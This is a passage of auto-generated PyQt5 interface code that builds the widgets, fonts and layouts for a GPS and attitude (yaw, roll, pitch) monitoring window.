QtWidgets.QLabel(self.horizontalLayoutWidget_2)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_10.setFont(font)\r\n self.label_10.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_10.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_10.setObjectName(\"label_10\")\r\n self.horizontalLayout_4.addWidget(self.label_10)\r\n self.lineEdit_topic_rec 
= QtWidgets.QLineEdit(self.horizontalLayoutWidget_2)\r\n self.lineEdit_topic_rec.setMinimumSize(QtCore.QSize(0, 25))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_topic_rec.setFont(font)\r\n self.lineEdit_topic_rec.setText(\"\")\r\n self.lineEdit_topic_rec.setObjectName(\"lineEdit_topic_rec\")\r\n self.horizontalLayout_4.addWidget(self.lineEdit_topic_rec)\r\n self.label_img = QtWidgets.QLabel(self.tab)\r\n self.label_img.setGeometry(QtCore.QRect(10, 50, 600, 600))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_img.setFont(font)\r\n self.label_img.setAutoFillBackground(False)\r\n self.label_img.setFrameShape(QtWidgets.QFrame.WinPanel)\r\n self.label_img.setFrameShadow(QtWidgets.QFrame.Plain)\r\n self.label_img.setLineWidth(3)\r\n self.label_img.setMidLineWidth(0)\r\n self.label_img.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_img.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_img.setObjectName(\"label_img\")\r\n self.horizontalLayoutWidget = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(630, 50, 370, 381))\r\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\r\n self.horizontalLayout_3.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_3.setSpacing(6)\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setSpacing(6)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.label = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label.setObjectName(\"label\")\r\n self.verticalLayout.addWidget(self.label)\r\n self.label_2 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_2.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_2.setFont(font)\r\n self.label_2.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_2.setObjectName(\"label_2\")\r\n self.verticalLayout.addWidget(self.label_2)\r\n self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_3.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_3.setFont(font)\r\n self.label_3.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_3.setObjectName(\"label_3\")\r\n self.verticalLayout.addWidget(self.label_3)\r\n self.label_4 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_4.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_4.setFont(font)\r\n self.label_4.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_4.setObjectName(\"label_4\")\r\n self.verticalLayout.addWidget(self.label_4)\r\n self.label_5 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_5.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_5.setFont(font)\r\n self.label_5.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_5.setObjectName(\"label_5\")\r\n 
self.verticalLayout.addWidget(self.label_5)\r\n self.label_6 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_6.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_6.setFont(font)\r\n self.label_6.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_6.setObjectName(\"label_6\")\r\n self.verticalLayout.addWidget(self.label_6)\r\n self.label_7 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_7.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_7.setFont(font)\r\n self.label_7.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_7.setObjectName(\"label_7\")\r\n self.verticalLayout.addWidget(self.label_7)\r\n self.label_8 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_8.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_8.setFont(font)\r\n self.label_8.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_8.setObjectName(\"label_8\")\r\n self.verticalLayout.addWidget(self.label_8)\r\n self.label_9 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_9.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_9.setFont(font)\r\n self.label_9.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_9.setObjectName(\"label_9\")\r\n self.verticalLayout.addWidget(self.label_9)\r\n self.horizontalLayout_3.addLayout(self.verticalLayout)\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_2.setContentsMargins(0, -1, -1, -1)\r\n self.verticalLayout_2.setSpacing(6)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.label_status = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_status.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_status.setFont(font)\r\n self.label_status.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_status.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_status.setScaledContents(False)\r\n self.label_status.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_status.setObjectName(\"label_status\")\r\n self.verticalLayout_2.addWidget(self.label_status)\r\n self.label_mode = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_mode.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_mode.setFont(font)\r\n self.label_mode.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_mode.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_mode.setScaledContents(False)\r\n self.label_mode.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_mode.setObjectName(\"label_mode\")\r\n self.verticalLayout_2.addWidget(self.label_mode)\r\n self.label_time = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_time.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_time.setFont(font)\r\n self.label_time.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n 
self.label_time.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_time.setScaledContents(False)\r\n self.label_time.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_time.setObjectName(\"label_time\")\r\n self.verticalLayout_2.addWidget(self.label_time)\r\n self.label_lat = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_lat.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_lat.setFont(font)\r\n self.label_lat.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_lat.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_lat.setScaledContents(False)\r\n self.label_lat.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_lat.setObjectName(\"label_lat\")\r\n self.verticalLayout_2.addWidget(self.label_lat)\r\n self.label_lon = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_lon.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_lon.setFont(font)\r\n self.label_lon.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_lon.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_lon.setScaledContents(False)\r\n self.label_lon.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_lon.setObjectName(\"label_lon\")\r\n self.verticalLayout_2.addWidget(self.label_lon)\r\n self.label_speed = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_speed.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_speed.setFont(font)\r\n self.label_speed.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_speed.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_speed.setScaledContents(False)\r\n self.label_speed.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_speed.setObjectName(\"label_speed\")\r\n self.verticalLayout_2.addWidget(self.label_speed)\r\n self.label_course = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_course.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_course.setFont(font)\r\n self.label_course.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_course.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_course.setScaledContents(False)\r\n self.label_course.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_course.setObjectName(\"label_course\")\r\n self.verticalLayout_2.addWidget(self.label_course)\r\n self.label_declination = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_declination.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_declination.setFont(font)\r\n self.label_declination.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_declination.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_declination.setScaledContents(False)\r\n self.label_declination.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_declination.setObjectName(\"label_declination\")\r\n self.verticalLayout_2.addWidget(self.label_declination)\r\n 
self.label_declination_dir = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_declination_dir.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_declination_dir.setFont(font)\r\n self.label_declination_dir.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_declination_dir.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_declination_dir.setScaledContents(False)\r\n self.label_declination_dir.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_declination_dir.setObjectName(\"label_declination_dir\")\r\n self.verticalLayout_2.addWidget(self.label_declination_dir)\r\n self.horizontalLayout_3.addLayout(self.verticalLayout_2)\r\n self.horizontalLayout_3.setStretch(1, 1)\r\n self.pushButton_reset = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_reset.setGeometry(QtCore.QRect(1010, 250, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_reset.setFont(font)\r\n self.pushButton_reset.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_reset.setObjectName(\"pushButton_reset\")\r\n self.pushButton_start = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_start.setGeometry(QtCore.QRect(1010, 90, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_start.setFont(font)\r\n self.pushButton_start.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_start.setObjectName(\"pushButton_start\")\r\n self.pushButton_stop = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_stop.setGeometry(QtCore.QRect(1010, 170, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_stop.setFont(font)\r\n self.pushButton_stop.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_stop.setObjectName(\"pushButton_stop\")\r\n self.horizontalLayoutWidget_3 = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget_3.setGeometry(QtCore.QRect(630, 440, 471, 211))\r\n self.horizontalLayoutWidget_3.setObjectName(\"horizontalLayoutWidget_3\")\r\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_3)\r\n self.horizontalLayout_5.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n self.horizontalLayout_5.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_5.setSpacing(6)\r\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\r\n self.label_debug = QtWidgets.QLabel(self.horizontalLayoutWidget_3)\r\n self.label_debug.setAutoFillBackground(False)\r\n self.label_debug.setStyleSheet(\"color: rgb(170, 85, 0);\")\r\n self.label_debug.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_debug.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_debug.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_debug.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\r\n self.label_debug.setWordWrap(False)\r\n self.label_debug.setObjectName(\"label_debug\")\r\n self.horizontalLayout_5.addWidget(self.label_debug)\r\n spacerItem3 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem3)\r\n self.pushButton_clear = QtWidgets.QPushButton(self.horizontalLayoutWidget_3)\r\n self.pushButton_clear.setMinimumSize(QtCore.QSize(0, 50))\r\n font = 
QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_clear.setFont(font)\r\n self.pushButton_clear.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_clear.setObjectName(\"pushButton_clear\")\r\n self.horizontalLayout_5.addWidget(self.pushButton_clear)\r\n self.horizontalLayout_5.setStretch(0, 2)\r\n self.label_gpsupdate = QtWidgets.QLabel(self.tab)\r\n self.label_gpsupdate.setGeometry(QtCore.QRect(1013, 340, 81, 41))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n font.setPointSize(12)\r\n self.label_gpsupdate.setFont(font)\r\n self.label_gpsupdate.setStyleSheet(\"\")\r\n self.label_gpsupdate.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_gpsupdate.setFrameShadow(QtWidgets.QFrame.Plain)\r\n self.label_gpsupdate.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_gpsupdate.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_gpsupdate.setObjectName(\"label_gpsupdate\")\r\n self.tabWidget.addTab(self.tab, \"\")\r\n self.tab_4 = QtWidgets.QWidget()\r\n self.tab_4.setObjectName(\"tab_4\")\r\n self.widget = QtWidgets.QWidget(self.tab_4)\r\n self.widget.setGeometry(QtCore.QRect(90, 60, 380, 261))\r\n self.widget.setStyleSheet(\"background-color: rgb(245, 255, 180);\")\r\n self.widget.setObjectName(\"widget\")\r\n self.horizontalLayoutWidget_8 = QtWidgets.QWidget(self.widget)\r\n self.horizontalLayoutWidget_8.setGeometry(QtCore.QRect(10, 40, 361, 221))\r\n self.horizontalLayoutWidget_8.setObjectName(\"horizontalLayoutWidget_8\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_8)\r\n self.horizontalLayout.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout.setSpacing(6)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_3.setSpacing(6)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.label_18 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_18.setFont(font)\r\n self.label_18.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_18.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_18.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_18.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_18.setObjectName(\"label_18\")\r\n self.verticalLayout_3.addWidget(self.label_18)\r\n self.label_19 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_19.setFont(font)\r\n self.label_19.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_19.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_19.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_19.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_19.setObjectName(\"label_19\")\r\n self.verticalLayout_3.addWidget(self.label_19)\r\n self.label_20 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_20.setFont(font)\r\n self.label_20.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_20.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_20.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_20.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_20.setObjectName(\"label_20\")\r\n self.verticalLayout_3.addWidget(self.label_20)\r\n self.horizontalLayout.addLayout(self.verticalLayout_3)\r\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\r\n 
self.verticalLayout_4.setSpacing(6)\r\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\r\n spacerItem4 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem4)\r\n self.label_yaw = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_yaw.setFont(font)\r\n self.label_yaw.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_yaw.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_yaw.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw.setObjectName(\"label_yaw\")\r\n self.verticalLayout_4.addWidget(self.label_yaw)\r\n self.label_yaw_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_yaw_3.setFont(font)\r\n self.label_yaw_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_yaw_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_yaw_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_3.setObjectName(\"label_yaw_3\")\r\n self.verticalLayout_4.addWidget(self.label_yaw_3)\r\n spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem5)\r\n self.label_roll = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_roll.setFont(font)\r\n self.label_roll.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_roll.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_roll.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll.setObjectName(\"label_roll\")\r\n self.verticalLayout_4.addWidget(self.label_roll)\r\n self.label_roll_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_roll_3.setFont(font)\r\n self.label_roll_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_roll_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_roll_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_3.setObjectName(\"label_roll_3\")\r\n self.verticalLayout_4.addWidget(self.label_roll_3)\r\n spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem6)\r\n self.label_pitch = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_pitch.setFont(font)\r\n self.label_pitch.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_pitch.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_pitch.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch.setObjectName(\"label_pitch\")\r\n self.verticalLayout_4.addWidget(self.label_pitch)\r\n self.label_pitch_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_pitch_3.setFont(font)\r\n self.label_pitch_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_pitch_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n 
self.label_pitch_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_3.setObjectName(\"label_pitch_3\")\r\n self.verticalLayout_4.addWidget(self.label_pitch_3)\r\n spacerItem7 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem7)\r\n self.horizontalLayout.addLayout(self.verticalLayout_4)\r\n self.verticalLayout_11 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_11.setSpacing(6)\r\n self.verticalLayout_11.setObjectName(\"verticalLayout_11\")\r\n spacerItem8 = QtWidgets.QSpacerItem(20, 33, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem8)\r\n self.label_yaw_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_yaw_v.setFont(font)\r\n self.label_yaw_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_yaw_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_yaw_v.setText(\"\")\r\n self.label_yaw_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_v.setObjectName(\"label_yaw_v\")\r\n self.verticalLayout_11.addWidget(self.label_yaw_v)\r\n self.label_yaw_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_yaw_dot.setFont(font)\r\n self.label_yaw_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_yaw_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_yaw_dot.setText(\"\")\r\n self.label_yaw_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_dot.setObjectName(\"label_yaw_dot\")\r\n self.verticalLayout_11.addWidget(self.label_yaw_dot)\r\n spacerItem9 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem9)\r\n self.label_roll_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_roll_v.setFont(font)\r\n self.label_roll_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_roll_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_roll_v.setText(\"\")\r\n self.label_roll_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_v.setObjectName(\"label_roll_v\")\r\n self.verticalLayout_11.addWidget(self.label_roll_v)\r\n self.label_roll_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_roll_dot.setFont(font)\r\n self.label_roll_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_roll_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_roll_dot.setText(\"\")\r\n self.label_roll_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_dot.setObjectName(\"label_roll_dot\")\r\n self.verticalLayout_11.addWidget(self.label_roll_dot)\r\n spacerItem10 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem10)\r\n self.label_pitch_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New 
Roman\")\r\n font.setPointSize(10)\r\n self.label_pitch_v.setFont(font)\r\n self.label_pitch_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_pitch_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_pitch_v.setText(\"\")\r\n self.label_pitch_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_v.setObjectName(\"label_pitch_v\")\r\n self.verticalLayout_11.addWidget(self.label_pitch_v)\r\n self.label_pitch_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_pitch_dot.setFont(font)\r\n self.label_pitch_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_pitch_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_pitch_dot.setText(\"\")\r\n self.label_pitch_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_dot.setObjectName(\"label_pitch_dot\")\r\n self.verticalLayout_11.addWidget(self.label_pitch_dot)\r\n spacerItem11 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem11)\r\n self.horizontalLayout.addLayout(self.verticalLayout_11)\r\n self.horizontalLayout.setStretch(2, 1)\r\n self.label_21 = QtWidgets.QLabel(self.widget)\r\n self.label_21.setGeometry(QtCore.QRect(10, 10, 361, 20))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n 